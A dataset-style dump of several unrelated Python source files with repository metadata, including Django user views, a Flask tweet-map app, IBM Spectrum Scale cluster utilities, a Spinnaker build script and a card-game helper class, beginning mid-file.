player2[2] = player2[2] + 1
elif score[0] < score[1]:
player1[2] = player1[2] + 1
player2[0] = player2[0] + 1
else:
player1[1] = player1[1] + 1
player2[1] = player2[1] + 1
player1[3] = player1[3] + score[0]
player2[3] = player2[3] + score[1]
player1[4] = player1[4] + score[1]
player2[4] = player2[4] + score[0]
return (player1, player2)
def get_stats(self, last = False):
return self._compute_stats(self.get_scores(last))
if __name__ == '__main__':
game = Game("Player1", "Player2")
game.add_score(1,2)
game.add_score(2,2)
game.add_score(3,0)
game.add_score(5,2)
print("Players: {} - {}".format(game.get_players()[0], game.get_players()[1]))
print("Last Score: {}".format(game.get_scores(1)))
print("Last 2 Scores: {}".format(game.get_scores(2)))
print("All Scores: {}".format(game.get_scores()))
print("last 2 Stats: {}".format(game.get_stats(2)[0]))
print("All Stats: {}".format(game.get_stats()[0]))
|
[
"nyquist@vaspun.eu"
] |
nyquist@vaspun.eu
|
e60e93dc8ee4e16f58b48ba4f6a316213c517aec
|
cbc05b48b8d11656f45e88cd18574311ffd36c96
|
/User/views.py
|
b96b6e2faf7eb5e0f6916550e919f2c33da2e622
|
[
"Apache-2.0"
] |
permissive
|
asiLukas/Initter
|
5d2fa4099b4baa9ef1727282ccc70fe669bd24b7
|
d2ac53c487a182e63d96f99842dcce1d6df51b03
|
refs/heads/main
| 2023-01-11T10:41:02.678008
| 2020-11-05T14:46:14
| 2020-11-05T14:46:14
| 294,745,893
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,712
|
py
|
from django.shortcuts import render, redirect, get_object_or_404
from .forms import RegisterForm, UserProfileForm
from django.contrib.auth.forms import User
from Post.models import Post
from .models import UserProfile, Following
from django.db import IntegrityError
from django.contrib import messages
def register_view(request):
form = RegisterForm()
profile_form = UserProfileForm()
if request.method == 'POST':
form = RegisterForm(request.POST or None, request.FILES or None)
profile_form = UserProfileForm(request.POST or None, request.FILES or None)
if form.is_valid() and profile_form.is_valid():
user = form.save()
profile = profile_form.save(commit=False)
profile.user = user
profile.save()
return redirect('/login')
context = {
'form': form,
'profile_form': profile_form
}
return render(request, 'registration/register.html', context)
def register_update_view(request, username):
usr = get_object_or_404(User, username=username)
context = {}
form = RegisterForm(request.POST or None, request.FILES or None, instance=usr)
if form.is_valid():
form.save()
return redirect('/')
context['form'] = form
context['usr'] = usr
return render(request, 'user/register_update.html', context)
def profile_update_view(request, user):
usr = get_object_or_404(UserProfile, user=user)
context = {}
form = UserProfileForm(request.POST or None, request.FILES or None, instance=usr)
if form.is_valid():
form.save()
return redirect('/')
context['form'] = form
context['usr'] = usr
return render(request, 'user/profile_update.html', context)
def search_view(request):
obj = User.objects.all()
context = {
'user': obj
}
return render(request, 'user/search.html', context)
def profile_view(request, username):
user = get_object_or_404(User, username=username)
current_user = request.user
post = Post.objects.all()
followers = user.follower.filter().values('follower').count()
follows = user.follow.filter().values('follow').count()
follower_list = current_user.follow.all().filter().values('follower')
if {'follower': user.id} not in follower_list: # If user is not follower yet, he can follow else he can unfollow
follow = True
else:
follow = False
# follow twice exception
try:
if follow:
if request.method == 'POST':
Following.objects.create(follower=user, follow=current_user)
return redirect('/profile/%s' % user)
else:
if request.method == 'POST':
Following.objects.filter(follow=current_user, follower=user).delete()
return redirect('/profile/%s' % user)
except IntegrityError:
messages.warning(
request,
'someone tried to follow twice'
)
context = {
'profile_user': user,
'post': post,
'follow': follow,
'followers': followers,
'follows': follows,
}
return render(request, 'user/profile.html', context)
def followers_list_view(request, username):
usr = get_object_or_404(User, username=username)
obj = usr.follower.all()
context = {
'obj': obj,
'usr': usr
}
return render(request, 'follow/followers_list.html', context)
def follows_list_view(request, username):
usr = get_object_or_404(User, username=username)
obj = usr.follow.all()
context = {
'obj': obj,
'usr': usr
}
return render(request, 'follow/follows_list.html', context)
|
[
"asi_Lukas"
] |
asi_Lukas
|
d19b463e86008ff952d5ee6c80258f131fa615f4
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_239/ch29_2019_03_12_22_46_31_027718.py
|
0a91b242cf0a08ab8005d9647b93dbba8cf3a9b3
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 119
|
py
|
def calcula_aumento(salario):
if salario<=1250:
y=salario*1.15
else:
y=salario*1.1
return y
|
[
"you@example.com"
] |
you@example.com
|
02ed07edd6a45a00079416634e74fa31507a0492
|
b6b9ce4aca0a0509b71d513c52f4c5d7def7ae34
|
/eb-flask/flask_ES.py
|
8864ef706ddcf5b8a2d0cdb81391822a9b59e804
|
[] |
no_license
|
hongyangbai/AWS-tweetmap
|
9764445ce2a30fc4d8d687e0fc2e98f75624e741
|
12fbebdb32cad8adbfe8083ebcfc69ee276a5dd0
|
refs/heads/master
| 2021-01-10T10:03:55.067779
| 2016-03-06T20:58:24
| 2016-03-06T20:58:24
| 53,175,508
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,259
|
py
|
from flask import Flask, render_template,json, request
import requests
from flask.ext.googlemaps import GoogleMaps
# Constant
ES_addr = 'http://ec2-54-191-81-250.us-west-2.compute.amazonaws.com:9200'
application = Flask(__name__)
GoogleMaps(application)
res_count = requests.get(ES_addr + '/twitter/tweets/_count')
count_json = json.loads(res_count.text)
@application.route('/',methods=['POST'])
def run2():
dp_res = request.form['dropdown']
selected = dp_res
query = json.dumps({
"size":5000,
"query": {
"match": {
"text": dp_res
}
}
})
res_query = requests.get(ES_addr + '/twitter/tweets/_search?', data=query)
query_json = json.loads(res_query.text)
coord_list = []
for i in range(len(query_json['hits']['hits'])):
coord_list.append([query_json['hits']['hits'][i]['_source']['text']] + query_json['hits']['hits'][i]['_source']['coordinates'])
return render_template('tweet-map-home.html', count = count_json['count'], coord_list = coord_list, selected = selected)
@application.route('/', methods=['GET','POST'])
def home():
return render_template('tweet-map-home.html', count = count_json['count'], coord_list = [])
|
[
"hongyangbai@Hongyangs-MBP.fios-router.home"
] |
hongyangbai@Hongyangs-MBP.fios-router.home
|
25d54484715177328534d1b96f8f8c823512a2c5
|
487f2eee45d360a9f005d85f527e0e1a230d35c2
|
/xml_to_csv.py
|
248ded0db8c25f331af3e9e3b07d481b328b8daa
|
[] |
no_license
|
IceMeooow/object_detection
|
d58e73197386ba6943c64216e667429e9bfb12c5
|
983e71e235750a7c5d7e2219e88a0961d5716c58
|
refs/heads/master
| 2020-03-26T11:14:18.677292
| 2018-08-17T21:08:13
| 2018-08-17T21:08:13
| 144,834,973
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
import os
import glob
import pandas as pd
import xml.etree.ElementTree as ET
def xml_to_csv(path):
xml_list = []
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
for member in root.findall('object'):
value = (root.find('filename').text,
int(root.find('size')[0].text),
int(root.find('size')[1].text),
member[0].text,
int(member[4][0].text),
int(member[4][1].text),
int(member[4][2].text),
int(member[4][3].text)
)
xml_list.append(value)
column_name = ['filename', 'width', 'height', 'class', 'xmin', 'ymin', 'xmax', 'ymax']
xml_df = pd.DataFrame(xml_list, columns=column_name)
return xml_df
def main():
for directory in ['train_data', 'test_data']:
image_path = os.path.join(os.getcwd(), directory)
xml_df = xml_to_csv(image_path)
xml_df.to_csv('data/{}_labels.csv'.format(directory), index=None)
print('Successfully converted xml to csv.')
main()
|
[
"ik@tenviz.com"
] |
ik@tenviz.com
|
26aade0fb9cb31611fa25167297833d09053becf
|
120120e2f7ed014dac87cceb55a49a11344aea0c
|
/roles/custom_module/module_utils/ibm_ss_cluster_utils.py
|
7505db716878e2f062325c17bd6db275ef6436f7
|
[
"Apache-2.0"
] |
permissive
|
Perf-Org-5KRepos/ibm-spectrum-scale-install-infra
|
4d9ba3e04b6bae1681de0b8062b872e092513c58
|
6c070b41985b5fe0549ed88813a29a9d96df8480
|
refs/heads/master
| 2022-11-09T22:08:27.028901
| 2020-06-26T03:04:09
| 2020-06-26T03:04:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,060
|
py
|
#!/usr/bin/python
#
# Copyright 2020 IBM Corporation
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
import time
from ibm_ss_utils import runCmd, parse_aggregate_cmd_output, \
parse_unique_records, GPFS_CMD_PATH, \
RC_SUCCESS, SpectrumScaleException
class SpectrumScaleNode:
def __init__(self, node_dict):
self.node = node_dict
self.node_number = int(self.node["nodeNumber"])
self.daemon_name = self.node["daemonNodeName"]
self.admin_name = self.node["adminNodeName"]
self.ip = self.node["ipAddress"]
self.admin_login = self.node["adminLoginName"]
self.designation = self.node["designation"]
self.other_roles = self.node["otherNodeRoles"]
self.role_alias = self.node["otherNodeRolesAlias"]
def get_node_number(self):
return self.node_number
def get_daemon_node_name(self):
return self.daemon_name
def get_admin_node_name(self):
return self.admin_name
def get_ip_address(self):
return self.ip
def get_admin_login_name(self):
return self.admin_login
def get_designation(self):
# The "designation" field can have the following values:
# "quorumManager"
# "quorum"
# "manager"
# ""
return self.designation
def get_other_node_roles(self):
# The "otherNodeRoles" field can have a comma seperated list of
# one of the following alphabets
# "M" - cloudNodeMarker
# "G" - gatewayNode
# "C" - cnfsNode
# "X" - cesNode
# "C" - ctdbNode
# "I" - ioNode
# "s" - snmpAgent
# "t" - tealAgent
# "Z" - perfmonNode
# "E" - cnfsEnabled
# "D" - cnfsDisabled
# "new" - NEW_NODE
# "" - OLD_NODE
# "Q" - quorumNode
# "N" - nonQuorumNode
return self.other_roles
def get_other_node_roles_alias(self):
# The "otherNodeRolesAlias" field can have a comma seperated list of
# one of the following
# "gateway"
# "ctdb"
# "ionode"
# "snmp_collector"
# "teal_collector"
# "perfmon"
# "ces"
# "cnfs"
return self.role_alias
def is_quorum_node(self):
if "quorum" in self.designation:
return True
return False
def is_manager_node(self):
if "manager" in (self.designation).lower():
return True
return False
def is_tct_node(self):
if "M" in self.other_roles:
return True
return False
def is_gateway_node(self):
if ("G" in self.other_roles or
"gateway" in self.role_alias):
return True
return False
def is_ctdb_node(self):
if "ctdb" in self.role_alias:
return True
return False
def is_io_node(self):
if ("I" in self.other_roles or
"ionode" in self.role_alias):
return True
return False
def is_snmp_node(self):
if ("s" in self.other_roles or
"snmp_collector" in self.role_alias):
return True
return False
def is_teal_node(self):
if ("t" in self.other_roles or
"teal_collector" in self.role_alias):
return True
return False
def is_perfmon_node(self):
if ("Z" in self.other_roles or
"perfmon" in self.role_alias):
return True
return False
def is_ces_node(self):
if ("X" in self.other_roles or
"ces" in self.role_alias):
return True
return False
def is_cnfs_node(self):
if ("E" in self.other_roles or
"D" in self.other_roles or
"cnfs" in self.role_alias):
return True
return False
def to_json(self):
return json.dumps(self.node)
def get_node_dict(self):
return self.node
def print_node(self):
print("Node Number : {0}".format(self.get_node_number()))
print("Daemon Node Name : {0}".format(self.get_daemon_node_name()))
print("IP Address : {0}".format(self.get_ip_address()))
print("Admin Node Name : {0}".format(self.get_admin_node_name()))
print("Designation : {0}".format(self.get_designation()))
print("Other Node Roles : {0}".format(self.get_other_node_roles()))
print("Admin Login Name : {0}".format(self.get_admin_login_name()))
print("Other Node Roles Alias : {0}".format(self.get_other_node_roles_alias()))
print("Is Quorum Node : {0}".format(self.is_quorum_node()))
print("Is Manager Node : {0}".format(self.is_manager_node()))
print("Is TCT Node : {0}".format(self.is_tct_node()))
print("Is Gateway Node : {0}".format(self.is_gateway_node()))
print("Is CTDB Node : {0}".format(self.is_ctdb_node()))
print("Is IO Node : {0}".format(self.is_io_node()))
print("Is SNMP Node : {0}".format(self.is_snmp_node()))
print("Is Teal Node : {0}".format(self.is_teal_node()))
print("Is Perfmon Node : {0}".format(self.is_perfmon_node()))
print("Is CES Node : {0}".format(self.is_ces_node()))
print("Is CNFS Node : {0}".format(self.is_cnfs_node()))
def __str__(self):
return str("Node Number : {0}\n"
"Daemon Node Name : {1}\n"
"IP Address : {2}\n"
"Admin Node Name : {3}\n"
"Designation : {4}\n"
"Other Node Roles : {5}\n"
"Admin Login Name : {6}\n"
"Other Node Roles Alias : {7}\n"
"Is Quorum Node : {8}\n"
"Is Manager Node : {9}\n"
"Is TCT Node : {10}\n"
"Is Gateway Node : {11}\n"
"Is CTDB Node : {12}\n"
"Is IO Node : {13}\n"
"Is SNMP Node : {14}\n"
"Is Teal Node : {15}\n"
"Is Perfmon Node : {16}\n"
"Is CES Node : {17}\n"
"Is CNFS Node : {18}".format(
self.get_node_number(),
self.get_daemon_node_name(),
self.get_ip_address(),
self.get_admin_node_name(),
self.get_designation(),
self.get_other_node_roles(),
self.get_admin_login_name(),
self.get_other_node_roles_alias(),
self.is_quorum_node(),
self.is_manager_node(),
self.is_tct_node(),
self.is_gateway_node(),
self.is_ctdb_node(),
self.is_io_node(),
self.is_snmp_node(),
self.is_teal_node(),
self.is_perfmon_node(),
self.is_ces_node(),
self.is_cnfs_node()))
@staticmethod
def get_state(node_names=[]):
stdout = stderr = ""
rc = RC_SUCCESS
cmd = [os.path.join(GPFS_CMD_PATH, "mmgetstate")]
if len(node_names) == 0:
cmd.append("-a")
else:
# If a set of node names have ben provided, use that instead
node_name_str = ' '.join(node_names)
cmd.append("-N")
cmd.append(node_name_str)
cmd.append("-Y")
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Retrieving the node state failed",
cmd[0], cmd[1:],
rc, stdout, stderr)
node_state_dict = parse_unique_records(stdout)
node_state_list = node_state_dict["mmgetstate"]
node_state = {}
for node in node_state_list:
node_state[node["nodeName"]] = node["state"]
return node_state
@staticmethod
def shutdown_node(node_name, wait=True):
stdout = stderr = ""
rc = RC_SUCCESS
if isinstance(node_name, basestring):
node_name_str = node_name
node_name_list = [node_name]
else:
node_name_str = ' '.join(node_name)
node_name_list = node_name
cmd = [os.path.join(GPFS_CMD_PATH, "mmshutdown"), "-N", node_name_str]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Shutting down node failed",
cmd[0], cmd[1:],
rc, stdout, stderr)
if wait:
# Wait for a maximum of 36 * 5 = 180 seconds (3 minutes)
MAX_RETRY = 36
retry = 0
done = False
while(not done and retry < MAX_RETRY):
time.sleep(5)
node_state = SpectrumScaleNode.get_state(node_name_list)
done = all("down" in state for state in node_state.values())
retry = retry + 1
if not done:
raise SpectrumScaleException("Shutting down node(s) timed out",
cmd[0], cmd[1:], -1, "",
"Node state is not \"down\" after retries")
return rc, stdout
@staticmethod
def start_node(node_name, wait=True):
stdout = stderr = ""
rc = RC_SUCCESS
if isinstance(node_name, basestring):
node_name_str = node_name
node_name_list = [node_name]
else:
node_name_str = ' '.join(node_name)
node_name_list = node_name
cmd = [os.path.join(GPFS_CMD_PATH, "mmstartup"), "-N", node_name_str]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Starting node failed", cmd[0],
cmd[1:], rc, stdout, stderr)
if wait:
# Wait for a maximum of 36 * 5 = 180 seconds (3 minutes)
MAX_RETRY = 36
retry = 0
done = False
while(not done and retry < MAX_RETRY):
time.sleep(5)
node_state = SpectrumScaleNode.get_state(node_name_list)
done = all("active" in state for state in node_state.values())
retry = retry + 1
if not done:
raise SpectrumScaleException("Starting node(s) timed out",
cmd[0], cmd[1:], -1, ""
"Node state is not \"active\" after retries")
return rc, stdout
class SpectrumScaleCluster:
def __retrieve_cluster_info(self):
stdout = stderr = ""
rc = RC_SUCCESS
cmd = [os.path.join(GPFS_CMD_PATH, "mmlscluster"), "-Y"]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Retrieving the cluster information failed",
cmd[0], cmd[1:], rc, stdout, stderr)
return parse_aggregate_cmd_output(stdout,
["clusterSummary",
"cnfsSummary",
"cesSummary"])
def __init__(self):
self.cluster_dict = self.__retrieve_cluster_info()
self.name = self.cluster_dict["clusterSummary"]["clusterName"]
self.c_id = self.cluster_dict["clusterSummary"]["clusterId"]
self.uid_domain = self.cluster_dict["clusterSummary"]["uidDomain"]
self.rsh_path = self.cluster_dict["clusterSummary"]["rshPath"]
self.rsh_sudo_wrapper = self.cluster_dict["clusterSummary"]["rshSudoWrapper"]
self.rcp_path = self.cluster_dict["clusterSummary"]["rcpPath"]
self.rcp_sudo_wrapper = self.cluster_dict["clusterSummary"]["rcpSudoWrapper"]
self.repository_type = self.cluster_dict["clusterSummary"]["repositoryType"]
self.primary_server = self.cluster_dict["clusterSummary"]["primaryServer"]
self.secondary_server = self.cluster_dict["clusterSummary"]["secondaryServer"]
def get_name(self):
return self.name
def get_id(self):
return self.c_id
def get_uid_domain(self):
return self.uid_domain
def get_rsh_path(self):
return self.rsh_path
def get_rsh_sudo_wrapper(self):
return self.rsh_sudo_wrapper
def get_rcp_path(self):
return self.rcp_path
def get_rcp_sudo_wrapper(self):
return self.rcp_sudo_wrapper
def get_repository_type(self):
return self.repository_type
def get_primary_server(self):
return self.primary_server
def get_secondary_server(self):
return self.secondary_server
def __str__(self):
return str("Cluster Name : {0}\n"
"Cluster ID : {1}\n"
"UID Domain : {2}\n"
"rsh Path : {3}\n"
"rsh Sudo Wrapper: {4}\n"
"rcp Path : {5}\n"
"rcp Sudo Wrapper: {6}\n"
"Repository Type : {7}\n"
"Primary Server : {8}\n"
"Secondary Server: {9}".format(
self.get_name(),
self.get_id(),
self.get_uid_domain(),
self.get_rsh_path(),
self.get_rsh_sudo_wrapper(),
self.get_rcp_path(),
self.get_rcp_sudo_wrapper(),
self.get_repository_type(),
self.get_primary_server(),
self.get_secondary_server()))
def to_json(self):
return json.dumps(self.cluster_dict)
def get_cluster_dict(self):
return self.cluster_dict
def get_nodes(self):
node_list = []
for node in self.cluster_dict["clusterNode"]:
node_instance = SpectrumScaleNode(node)
node_list.append(node_instance)
return node_list
@staticmethod
def delete_node(node_name):
stdout = stderr = ""
rc = RC_SUCCESS
if isinstance(node_name, basestring):
node_name_str = node_name
else:
node_name_str = ' '.join(node_name)
cmd = [os.path.join(GPFS_CMD_PATH, "mmdelnode"), "-N", node_name_str]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Deleting node from cluster failed",
cmd[0], cmd[1:], rc, stdout, stderr)
return rc, stdout
@staticmethod
def add_node(node_name, stanza_path):
stdout = stderr = ""
rc = RC_SUCCESS
if isinstance(node_name, basestring):
node_name_str = node_name
else:
node_name_str = ' '.join(node_name)
cmd = [os.path.join(GPFS_CMD_PATH, "mmaddnode"),
"-N", stanza_path, "--accept"]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Adding node to cluster failed",
cmd[0], cmd[1:],
rc, stdout, stderr)
return rc, stdout, stderr
@staticmethod
def apply_license(node_name, license):
stdout = stderr = ""
rc = RC_SUCCESS
if isinstance(node_name, basestring):
node_name_str = node_name
else:
node_name_str = ' '.join(node_name)
cmd = [os.path.join(GPFS_CMD_PATH, "mmchlicense"), license,
"--accept", "-N", node_name_str]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Changing license on node failed",
cmd[0], cmd[1:],
rc, stdout, stderr)
return rc, stdout
@staticmethod
def create_cluster(name, stanza_path):
stdout = stderr = ""
rc = RC_SUCCESS
cmd = [os.path.join(GPFS_CMD_PATH, "mmcrcluster"), "-N", stanza_path,
"-C", name]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Creating cluster failed",
cmd[0], cmd[1:],
rc, stdout, stderr)
return rc, stdout
@staticmethod
def delete_cluster(name):
stdout = stderr = ""
rc = RC_SUCCESS
cmd = [os.path.join(GPFS_CMD_PATH, "mmdelnode"), "-a"]
try:
stdout, stderr, rc = runCmd(cmd, sh=False)
except Exception as e:
raise SpectrumScaleException(str(e), cmd[0], cmd[1:],
-1, stdout, stderr)
if rc != RC_SUCCESS:
raise SpectrumScaleException("Deleting cluster failed",
cmd[0], cmd[1:],
rc, stdout, stderr)
return rc, stdout
def main():
cluster = SpectrumScaleCluster()
print(cluster.to_json())
print("\n")
for node in cluster.get_nodes():
print(node)
print("\n")
if __name__ == "__main__":
main()
|
[
"mutmuthi@in.ibm.com"
] |
mutmuthi@in.ibm.com
|
c15dd485cf3f4d881f10b046eb48569bf69ba54c
|
46c148c50a008da9af4b36a2ec0f0cf3dda1a3a7
|
/dev/build_prevalidation.py
|
5b8de879cbf976c013dab85795f2842449a45b2f
|
[
"Apache-2.0"
] |
permissive
|
dcaro/spinnaker
|
caa1f1ff5d76bf7c22f6fdbc18343811e5fe2a6c
|
7e6836f36f0d98564bd466a95626625ff495e2c9
|
refs/heads/master
| 2021-01-18T22:57:02.897724
| 2017-06-02T19:03:33
| 2017-06-02T19:03:33
| 93,205,405
| 1
| 0
| null | 2017-06-02T21:32:53
| 2017-06-02T21:32:53
| null |
UTF-8
|
Python
| false
| false
| 4,409
|
py
|
#!/usr/bin/python
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import sys
from annotate_source import Annotator
from build_release import Builder
from generate_bom import BomGenerator
from refresh_source import Refresher
from spinnaker.run import check_run_quick
def __annotate_component(annotator, component):
"""Annotate the component's source but don't include it in the BOM.
Returns:
Tuple of ([VersionBump] Halyard version bump, [string] head commit hash)
"""
annotator.path = component
annotator.parse_git_tree()
version_bump = annotator.tag_head()
head_hash = annotator.get_head_commit()
annotator.delete_unwanted_tags()
return (version_bump, head_hash)
def __record_halyard_nightly_version(version_bump, head_hash, options):
"""Record the version and commit hash at which Halyard was built in a bucket.
Assumes that gsutil is installed on the machine this script is run from.
This function uses `gsutil rsync` to read the GCS file, changes it in-place,
and then uses `gsutil rsync` to write the file again. `rsync` is eventually
consistent, so running this script (or manually manipulating the GCS file)
concurrently could likely result in file corruption. Don't parallelize this.
"""
bucket_uri = options.hal_nightly_bucket_uri
build_number = options.build_number
local_bucket_name = os.path.basename(bucket_uri)
# Copy all the bucket contents to local (-r) and get rid of extra stuff (-d).
if not os.path.exists(local_bucket_name):
os.mkdir(local_bucket_name)
check_run_quick('gsutil rsync -r -d {remote_uri} {local_bucket}'
.format(remote_uri=bucket_uri, local_bucket=local_bucket_name))
hal_version = version_bump.version_str.replace('version-', '')
new_hal_nightly_entry = ('{version}-{build}: {commit}'
.format(version=hal_version, build=build_number, commit=head_hash))
nightly_entry_file = '{0}/nightly-version-commits.yml'.format(local_bucket_name)
with open(nightly_entry_file, 'a') as nef:
nef.write('{0}\n'.format(new_hal_nightly_entry))
# Now sync the local dir with the bucket again after the update.
check_run_quick('gsutil rsync -r -d {local_bucket} {remote_uri}'
.format(remote_uri=bucket_uri, local_bucket=local_bucket_name))
def init_argument_parser(parser):
parser.add_argument('--hal_nightly_bucket_uri', default='',
help='The URI of the bucket to record the version and commit at which we built Halyard.')
# Don't need to init args for Annotator since BomGenerator extends it.
BomGenerator.init_argument_parser(parser)
Builder.init_argument_parser(parser)
def main():
"""Build a Spinnaker release to be validated by Citest.
"""
parser = argparse.ArgumentParser()
init_argument_parser(parser)
options = parser.parse_args()
annotator = Annotator(options)
halyard_bump, halyard_head_hash = __annotate_component(annotator, 'halyard')
bom_generator = BomGenerator(options)
bom_generator.determine_and_tag_versions()
if options.container_builder == 'gcb':
bom_generator.write_container_builder_gcr_config()
elif options.container_builder == 'docker':
bom_generator.write_docker_version_files()
else:
raise NotImplementedError('container_builder="{0}"'
.format(options.container_builder))
Builder.do_build(options, build_number=options.build_number,
container_builder=options.container_builder)
# Load version information into memory and write BOM to disk. Don't publish yet.
bom_generator.write_bom()
bom_generator.publish_microservice_configs()
__record_halyard_nightly_version(halyard_bump, halyard_head_hash, options)
bom_generator.publish_boms()
bom_generator.generate_changelog()
if __name__ == '__main__':
sys.exit(main())
|
[
"noreply@github.com"
] |
dcaro.noreply@github.com
|
3a8767df98e7b1d18e76b37e85c90b3bf01bdcf9
|
f702230ed3a5e1bc3f033b3330b90e517ee6603f
|
/blog/models.py
|
8a13891964de2b8a653acb07df8e3291a79ae81d
|
[] |
no_license
|
yanadhorn/crdb
|
9a670feab0d16fcf66f1180418d686dad30fcd50
|
31bd85a674784f125bc44f597b8bb1b90c08226b
|
refs/heads/master
| 2020-04-03T10:50:57.414455
| 2018-12-04T07:51:05
| 2018-12-04T07:51:05
| 155,204,209
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 821
|
py
|
from django.db import models
from persons.models import person
#import user django
from django.conf import settings
# Create your models here.
# title
# pub_date
# body
# image
class Blog(models.Model):
title = models.CharField(max_length=255)
pub_date = models.DateTimeField()
body = models.TextField()
image = models.ImageField(upload_to='images/')
# person_related = models.ManyToManyField(person)
author = models.ForeignKey(settings.AUTH_USER_MODEL,on_delete=models.CASCADE)
objects = models.Manager()
def __str__(self):
return self.title
def summary(self):
return self.body[0:100]
def pub_date_pretty(self):
return self.pub_date.strftime('%b %e %Y')
# Add the blog app to the setting
# Create a migration
# Migrate
# Add the admin
|
[
"yanadhorn@gmail.com"
] |
yanadhorn@gmail.com
|
e8506016d8eec7e2aa0b0eade7ae260234fc235d
|
7edf5b52eb27dd5c757ec7fef1fd0c8ff581cb46
|
/src/settings/config.py
|
e9068410a9875d793cc973abbe5513521915cef2
|
[
"MIT"
] |
permissive
|
NNNMM12345/Discord_Sandbot
|
d9bc520a44ef623dbf87d3aa8b5a2bbf2884f5e1
|
76ed7a97efd1d6d0eb7efd9aff78985e63cfb6c6
|
refs/heads/master
| 2021-04-15T06:41:16.460399
| 2018-04-01T12:48:55
| 2018-04-01T12:48:55
| 126,205,295
| 4
| 2
|
MIT
| 2018-04-01T11:27:03
| 2018-03-21T16:04:24
|
Python
|
UTF-8
|
Python
| false
| false
| 91
|
py
|
from utility.load import get_api_token
DISCORD_TOKEN = get_api_token('discord_api_token')
|
[
"e.cousinet@gmail.com"
] |
e.cousinet@gmail.com
|
98977b0c1310b852289fc427fb6ec1c464638be7
|
dcd1e10a3cf9f197ce35d2db03042041c1959697
|
/ismcts/jass_stuff/hands.py
|
3834fba0766965c2b7d0b0c429d83e283fb6341c
|
[] |
no_license
|
larryharry/jass-bot
|
040ec477fa9bb3eecf11efede579210de53cba31
|
7eb1d8795f678c5a09c20a11cba223ce8b0238d2
|
refs/heads/master
| 2023-01-31T15:15:44.439728
| 2020-12-16T18:07:34
| 2020-12-16T18:07:34
| 300,552,114
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,551
|
py
|
from __future__ import annotations
from __future__ import annotations
from typing import List
import numpy as np
from ismcts.jass_stuff.hand import Hand
class Hands:
def __init__(self, hands: List[Hand]):
self._hands = hands
@classmethod
def empty(cls):
return cls([Hand.empty(), Hand.empty(), Hand.empty(), Hand.empty()])
@classmethod
def by_hot_encoded(cls, hot_encoded_hands: np.ndarray) -> Hands:
hands = cls.empty()
for player, hot_encoded_hand in enumerate(hot_encoded_hands):
hands.add_hand(player, Hand.by_hot_encoded(hot_encoded_hand))
return hands
def add_hand(self, player: int, hand: Hand) -> None:
self._hands[player] = hand
def is_fully_covered_by(self, hands: Hands) -> bool:
for player in range(4):
if not hands.get_hand(player).is_fully_covered_by(self._hands[player]):
return False
return True
def get_hand(self, player: int) -> Hand:
if self._hands[player] == -1:
raise Exception('There is no hand for user {} '.format(player))
else:
return self._hands[player]
def does_player_has_card(self, player: int, card: int) -> bool:
return card in self._hands[player]
def remove_card_for_player(self, player: int, card: int) -> None:
self._hands[player].remove_card(card)
def copy(self) -> Hands:
hands = Hands.empty()
for i in range(4):
hands.add_hand(i, self._hands[i])
return hands
|
[
"steinegger.manuel@gmail.com"
] |
steinegger.manuel@gmail.com
|
